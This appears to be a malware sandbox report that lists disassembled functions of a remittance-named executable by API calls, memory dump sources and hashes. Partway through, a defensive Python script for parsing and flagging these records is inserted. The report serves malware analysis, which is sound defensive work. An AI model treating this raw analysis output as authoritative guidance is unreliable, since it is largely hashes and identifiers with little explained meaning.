                                                                      • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                      • String ID:
                                                                      • API String ID: 262282135-0
                                                                      • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                      • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                      • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                      • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                      • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                      • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                      • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                      • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 312131281-0
                                                                      • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                      • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                      • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                      • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                      APIs
                                                                        • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                      • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
                                                                      • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                                                        • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                      • String ID:
                                                                      • API String ID: 3771399671-0
                                                                      • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                      • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                      • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                      • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                      • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                      • String ID:
                                                                      • API String ID: 2156557900-0
                                                                      • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                      • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                      • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                      • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
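The function records above (APIs, Memory Dump Source, Similarity) are easier to triage once they are structured. The following Python is an added example for this report, not Joe Sandbox code: it parses records in this layout into objects and flags API combinations worth a second look, such as AttachThreadInput against the thread that owns the foreground window. The sample input is constructed from the record layout on this page; the indicator labels and their API sets are my own assumptions, not Joe Sandbox signatures.

```python
"""Parse Joe Sandbox function records (APIs / Memory Dump Source / Similarity)
into objects and flag API combinations worth a second look. Added example; the
sample below is constructed in the layout of the records on this page."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 00434643
• GetForegroundWindow.USER32(00000000), ref: 00434655
• GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
APIs
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• lstrcmpiW.KERNEL32(?,?), ref: 00453900
• MoveFileW.KERNEL32(?,?), ref: 00453932
Similarity
• API ID: File$AttributesFullMoveNamePathlstrcmpi
• String ID:
"""

SECTION_HEADINGS = {"APIs", "Strings", "Memory Dump Source",
                    "Joe Sandbox IDA Plugin", "Similarity"}

# "<Name>.<Module>(<args>), ref: <addr>", optionally prefixed by the report's
# "Part of subcall function <addr>: " marker for calls made inside a callee.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")

# Assumed indicator rules: my own labels and API sets, not Joe Sandbox signatures.
INDICATORS: Dict[str, frozenset] = {
    "attaches to the foreground window's input thread":
        frozenset({"GetForegroundWindow", "GetWindowThreadProcessId", "AttachThreadInput"}),
    "moves a file after a case-insensitive path compare":
        frozenset({"lstrcmpiW", "MoveFileW"}),
}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    caller: Optional[str] = None  # set for "Part of subcall function" lines

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    source_file: Optional[str] = None
    similarity: Dict[str, str] = field(default_factory=dict)

def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADINGS:
            # Similarity is the last block of a record, so any other heading
            # that follows it (APIs, Strings, Memory Dump Source) opens a new one.
            if cur is None or (section == "Similarity" and line != "Similarity"):
                cur = FunctionRecord()
                records.append(cur)
            section = line
            continue
        if cur is None:
            continue  # stray text before the first heading
        item = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                cur.apis.append(ApiCall(m.group("name"), m.group("module"),
                                        args, m.group("ref"), m.group("caller")))
        elif section == "Strings":
            cur.strings.append(item)
        elif section == "Memory Dump Source" and item.startswith("Source File: "):
            cur.source_file = item[len("Source File: "):].split(",")[0]
        elif section == "Similarity":
            key, _, value = item.partition(":")
            cur.similarity[key.strip()] = value.strip()
    return records

def match_indicators(rec: FunctionRecord) -> List[str]:
    """Labels of every indicator whose API set is fully present in the record."""
    names = {call.name for call in rec.apis}
    return [label for label, needed in INDICATORS.items() if needed <= names]
```

Feed `parse_records` the saved text of the function listing; a record whose APIs block is empty (only a Similarity block survives) yields an empty call list and matches no indicator, and the `caller` field lets you separate a function's own calls from those the report attributes to its callees.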
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 0-1603158881
                                                                      • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                      • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                      • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                      • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                      APIs
                                                                      • CreateMenu.USER32 ref: 00448603
                                                                      • SetMenu.USER32(?,00000000), ref: 00448613
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                      • IsMenu.USER32(?), ref: 004486AB
                                                                      • CreatePopupMenu.USER32 ref: 004486B5
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                      • DrawMenuBar.USER32 ref: 004486F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                      • String ID: 0
                                                                      • API String ID: 161812096-4108050209
                                                                      • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                      • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                      • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                      • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe), ref: 00434057
                                                                      • LoadStringW.USER32(00000000), ref: 00434060
                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                      • LoadStringW.USER32(00000000), ref: 00434078
                                                                      • _wprintf.LIBCMT ref: 004340A1
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                      Strings
                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                      • C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe, xrefs: 00434040
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                      • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
                                                                      • API String ID: 3648134473-891288512
                                                                      • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                      • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                      • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                      • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                                      • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                      • Opcode Fuzzy Hash: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                                      • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                      • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                      • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                      • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                      APIs
                                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,0040F545,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,004A90E8,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,?,0040F545), ref: 0041013C
                                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 978794511-0
                                                                      • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                      • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                      • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                      • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                      • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                      • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                      • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                      • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                      • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                      • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: _memmove$_memcmp
• String ID: '$\$h
• API String ID: 2205784470-1303700344
• Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
• Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
• Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
• Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
APIs
• VariantInit.OLEAUT32(00000000), ref: 0045EA56
• VariantCopy.OLEAUT32(00000000), ref: 0045EA60
• VariantClear.OLEAUT32 ref: 0045EA6D
• VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
• __swprintf.LIBCMT ref: 0045EC33
• VariantInit.OLEAUT32(00000000), ref: 0045ECEE
Strings
• %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
Similarity
• API ID: Variant$InitTime$ClearCopySystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d
• API String ID: 2441338619-1568723262
• Opcode ID: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
